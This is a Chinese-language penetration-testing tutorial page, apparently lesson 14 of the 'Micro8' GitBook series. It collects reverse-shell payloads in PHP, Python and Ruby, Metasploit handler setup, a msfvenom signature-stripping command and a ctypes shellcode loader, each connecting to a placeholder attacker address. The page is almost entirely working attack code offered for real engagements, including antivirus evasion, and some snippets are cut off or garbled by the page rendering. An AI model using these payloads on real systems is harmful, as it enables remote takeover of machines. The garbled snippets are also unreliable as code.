Micro8
专注APT攻击与防御
Search…
前言
Preface
目录
第一章:生
1-10课
11-20课
第十一课:工具介绍Veil-Evasion
第十二课:基于UDP发现内网存活主机
第十三课:基于ARP发现内网存活主机
第十四课:基于第十课补充payload1
第十五课:基于第十课补充payload2
第十六课:红蓝对抗渗透测试1
第十七课:红蓝对抗渗透测试2
第十八课:红蓝对抗渗透测试3
第十九课:基于netbios发现内网存活主机
第二十课:基于snmp发现内网存活主机
21-30课
31-40课
41-50课
51-60课
61-70课
71-80课
81-90课
91-100课
第二章:老(待更新...)
第三章:病(待更新...)
Powered By
GitBook
第十四课:基于第十课补充payload1
在实战中可能会遇到各种诉求 payload,并且可能遇到各种实际问题,如杀毒软件,防火墙拦截,特定端口通道,隧道等问题。这里我们根据第十课补充其中部分,其他内容后续补充。
这次主要补充了 PHP,python,ruby。
ps:在线代码高亮:
http://tool.oschina.net/highlight
1、php-payload
1
msf
>
use exploit/multi/handler
2
msf exploit
(
handler
)
>
set
payload windows/meterpreter/reverse_tcp
3
payload
=>
windows/meterpreter/reverse_tcp
4
msf exploit
(
handler
)
>
set
LHOST
192.168
.1.107
5
LHOST
=>
192.168
.1.107
Copied!
1
<?
2
php
error_reporting
(
0
)
;
$ip
=
'x.x.x.x'
;
$port
=
53
;
if
((
$f
=
'stream_socket_client'
)
&&
is_callable
(
$f
))
{
3
{
$port
}
"
)
;
$s_type
=
'stream'
;
}
if
(
!
$s
&&
(
$f
=
'fsockopen'
)
&&
is_callable
(
$f
))
{
$s
=
$f
(
$ip
,
$port
)
;
$s_
4
strlen
(
$b
))
;
break
;
case
'socket'
:
$b
.=
socket_read
(
$s
,
$len
-
strlen
(
$b
))
;
break
;
}
}
$GLOBALS
[
'msgsock'
]
=
$s
;
5
$GLOBALS
[
'msgsock_type'
]
=
$s_type
;
if
(
extension_loaded
(
's
6
>
Copied!
1
<?php
2
$sock
=
fsockopen
(
"xx.xx.xx.xx"
,
xx
)
;
exec
(
"/bin/sh -i <&3 >&3 2>&3"
)
;
3
?>
Copied!
2、python-payload
1
msf
>
use exploit/multi/handler
2
msf exploit
(
handler
)
>
set
payload windows/meterpreter/reverse_tcp
3
payload
=>
windows/meterpreter/reverse_tcp
4
msf exploit
(
handler
)
>
set
LHOST
192.168
.1.107
5
LHOST
=>
192.168
.1.107
Copied!
1
import
socket
,
struct
,
time
2
for
x
in
range
(
10
):
3
try
:
4
s
=
socket
.
socket
(
2
,
socket
.
SOCK_STREAM
)
5
s
.
connect
((
'x.x.x.x'
,
xx
))
6
break
7
except
:
8
time
.
sleep
(
5
)
l
=
struct
.
unpack
(
'>I'
,
s
.
recv
(
4
))[
0
]
9
d
=
s
.
recv
(
l
)
10
while
len
(
d
)
<
l
:
11
d
+=
s
.
recv
(
l
-
len
(
d
))
12
exec
(
d
,{
's'
:
s
})
Copied!
1
import
socket
,
subprocess
,
os;
2
s
=
socket
.
socket
(
socket
.
AF_INET
,
socket
.
SOCK_STREAM
)
;s
.
connect
((
"xx.xx.xx.xx"
,
xx
))
;
3
i"
])
;
Copied!
1
import
socket
import
subprocess
2
s
=
socket
.
socket
()
3
s
.
connect
((
"xx.xx.xx.xx"
,
xx
))
4
while
1
:
5
p
=
subprocess
.
Popen
(
s
.
recv
(
1024
),
6
shell
=
True
,
7
stdout
=
subprocess
.
PIPE
,
8
stderr
=
subprocess
.
PIPE
,
9
stdin
=
subprocess
.
send
(
p
.
stdout
.
read
()
+
p
.
stderr
.
read
()
10
)
Copied!
删除特征:
1
[email protected]
:~
# msfvenom -p windows/meterpreter/reverse_tcp LHOST=8.8.8.8 LPORT=88 -f c | tr -d '"' | tr -d '\n'
Copied!
1
from
ctypes
import
*
2
3
reverse_shell
=
"\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72
4
micropoorshell
=
create_string_buffer
(
reverse_shell
,
len
(
reverse_shell
))
5
shellcode
=
cast
(
micropoorshell
,
CFUNCTYPE
(
c_void_p
))
6
shellcode
()
Copied!
2、ruby-payload
1
require
'socket'
;c
=
TCPSocket
.
new
(
"xx.xx.xx.xx"
,
x
)
;
$stdin
.
reopen
(
c
)
;
$stdout
.
reopen
(
c
)
;
$stderr
.
reopen
(
c
)
;
$stdi
2
(
IO
.
popen
(
l
,
"rb"
){
|
fd
|
fd
.
each_line
{
|
o
|
c
.
puts
(
o
.
strip
)
}})
rescue
nil
}
Copied!
1
require
'socket'
;f
=
TCPSocket
.
open
(
"xx.xx.xx.xx"
,
xx
).
to_i;exec sprintf
(
"/bin/sh -i <&%d >&%d 2>&%d"
,
f
,
f
,
f
)
Copied!
1
require
'socket'
;c
=
TCPSocket
.
new
(
"xx.xx.xx.xx"
,
"xx"
)
;
while
(
cmd
=
c
.
gets
)
;
IO
.
popen
(
cmd
,
"r"
){
|
io
|
c
.
print io
.
read
}
end
Copied!
1
c
=
TCPSocket
.
new
(
"xx.xx.xx.xx"
,
"xx"
)
;
while
(
cmd
=
c
.
gets
)
;
IO
.
popen
(
cmd
,
"r"
){
\
|
io\
|
c
.
print
2
io
.
read
}
end
Copied!
--By Micropoor
Previous
第十三课:基于ARP发现内网存活主机
Next
第十五课:基于第十课补充payload2
Last modified
3yr ago
Copy link
Contents
1、php-payload
2、python-payload
2、ruby-payload